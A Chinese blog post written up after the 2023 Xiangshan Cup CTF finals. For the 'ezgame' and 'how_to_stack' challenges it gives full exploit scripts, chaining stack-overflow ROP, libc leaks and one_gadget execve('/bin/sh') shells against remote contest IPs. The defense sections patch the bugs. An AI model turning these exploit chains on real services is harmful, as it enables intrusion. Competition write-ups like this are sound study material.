香山杯决赛2023.11.19
香山杯决赛
附件如下。
https://files.cnblogs.com/files/blogs/798207/xsb2023_final.tar.gz?t=1700382211&download=true
2023.11.19 广东中山
回家了两天,见了高中同学,晚上还去中大玩一下,明天回青岛。
孤胆英雄,归途远征。以一敌百,天下无双。
ezgame
攻击
有栈溢出漏洞,直接打游戏打到能打大boss溢出即可。
#!python from evilblade import * context(os='linux', arch='amd64') context(os='linux', arch='amd64', log_level='debug') setup('./pwn2') libset('./libc-2.31.so') evgdb() rsetup('39.106.48.123', 31448) puts = pltadd('puts') putsg = gotadd('puts') rdi = 0x0000000000401a3b# pop rdi ; ret for i in range(50): sla('>',b'2') sla('?',b'1') sla('>',b'6') sla('>',b'1') sla('>',b'1') sla('>',b'1') sla('>',b'1') sla('>',b'1') sla('>',b'1') sla('>',b'1') sla('>',b'2') sla('>',b'2') sla('>',b'2') sla('>',b'2') sla('>',b'2') sla('>',b'2') sla('>',b'2') sla('>',b'3') sla('>',b'2') sla('?',b'2') sla('name',b'a'*0x658+p64(rdi)+p64(putsg)+p64(puts)+p64(0x4011d2)) ret = 0x0000000000401016 # ret addx = tet() addx = getx64(0,-1) base = getbase(addx,'puts') dpx('base',base) sys = symoff('system',base) sh = base+0x00000000001b45bd pause() sla('>',b'2') sla('?',b'2') #sla('name',b'a'*0x658+p64(rdi)+p64(sh)+p64(ret)*2+p64(sys)) sla('name',b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaaezaaaaaafbaaaaaafcaaaaaafdaaaaaafeaaaaaaffaaaaaafgaaaaaafhaaaaaafiaaaaaafjaaaaaafkaaaaaaflaaaaaafmaaaaaafnaaaaaafoaaaaaafpaaaaaafqaaaaaafraaaaaafsaaaaaaftaaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaafzaaaaaagbaaaaaagcaaaaaagdaaaaaageaaaaaagfaaaaaaggaaaaaaghaaaaaagiaaaaaagjaaaaaagkaaaaaaglaaaaaagmaaaaaagnaaaaaagoaaaaaagpaaaaaagqaaaaaagraaaaaagsaaaaaagtaaaaaaguaaaaaagvaaaaaagwaaaaaagxaaaaaagyaaaaaagzaaaaaahbaaaaaahcaaaaaahdaaaaaaheaaaaaahfaaaaaahgaaaaaahhaaaaaahiaaaaaahjaaaaaahkaaaaaahlaaaaaahmaaaaaahnaaaaaahoaaaaaahpaaaaaahqaaaaaahraaaaaahsaaaaaahtaaaaaahuaaaaaahvaaaaaahwaaaaaahxaaaaaahyaaaaaahzaaaaaaibaaaaaaicaaaaaai'+p64(rdi)+p64(sh)+p64(ret)+p64(sys)) dpx('base',base) ia()
防御
由于存在栈溢出漏洞,添加相应防护即可。我是添加了限制execve的使用。
how_to_stack
攻击
赛后三分钟做出来的,有些可惜,不过一起写上来吧。
利用解密加密的方式,打入-1无需加密,泄露栈上内存,并且栈上内存可以指定,先泄露stack再泄露pie,打ret2os。
所以真的要非常在意栈上控制的临时变量!!!控制临时变量可以控制很多啊 !!!!!!
#!python from evilblade import * context(os='linux', arch='amd64') context(os='linux', arch='amd64', log_level='debug') setup('./pwn2') libset('./libc.so.6') evgdb() rsetup('47.94.85.181', 41463) rdi = 0x0000000000401a3b# pop rdi ; ret sl(b'1') sl(b'-1') sa('Data',b'a'*0x67) ru('hex: ') data = ru('\n')[:-1].decode() dp('data',data) data = data.split(' ') dp('data',data) datab = b'' for i in data: datab += p8(int(i,16)) dp('datab len',len(datab)) dp('datab',(datab)) pay = datab datab = uu64(datab[-6:]) dpx('datab',(datab)) stack = datab sl(b'0') sl(b'-1') pay = b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'+p64(stack-0x70) sa('Data',pay+p64(stack-0x100)) print(len(pay)) print((pay)) ru('hex: ') data = ru('\n')[:-1].decode() dp('data',data) data = data.split(' ') dp('data',data) datab = b'' for i in data: datab += p8(int(i,16)) dp('datab len',len(datab)) dp('datab',(datab)) datab = uu64(datab[-6:]) pie = datab-6309 dpx('datab',(pie)) rdi = 0x00000000000019d3+pie #pop rdi ; ret ret = 0x000000000000101a+pie #ret puts = pltadd('puts')+pie putsg = gotadd('puts')+pie ru(':') sl(b'0') sl(b'-1') pay = b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'+p64(stack) sa('Data',pay+p64(stack-0x60)+p64(rdi)+p64(putsg)+p64(puts)+p64(pie+0x16af)) ru('\n') ru('\n') libc = getx64(0,-1) base = getbase(libc,'puts') os = base+0xe3b01 sl(b'-1') sa('Data',pay+b'\0\0'+p64(stack)[:-2]+p64(os)) ia() ''' constraints: [r15] == NULL || r15 == NULL [r12] == NULL || r12 == NULL 0xe3b01 execve("/bin/sh", r15, rdx) constraints: [r15] == NULL || r15 == NULL [rdx] == NULL || rdx == NULL 0xe3b04 execve("/bin/sh", rsi, rdx) constraints: [rsi] == NULL || rsi == NULL [rdx] == NULL || rdx == NULL '''
防御
这题有
result = nbytes; if ( (_DWORD)nbytes ) { memset(s, 0, 0x60uLL); printf("Data: "); read(0, s,nbytes );
把nbytes改为0x60即可防止溢出。
camera
防御
由于打堆都需要泄露,函数里的printf不安全,会泄露libc地址,把他换成程序自带的安全打印即可。
__int64 __fastcall sub_1768(const char *a1) { int v2; // [rsp+1Ch] [rbp-4h] v2 = strlen(a1); write(1, a1, v2); return 1LL; }
把call print改为call上面这个。
本文作者:.N1nEmAn
本文链接:https://www.cnblogs.com/9man/p/17842215.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步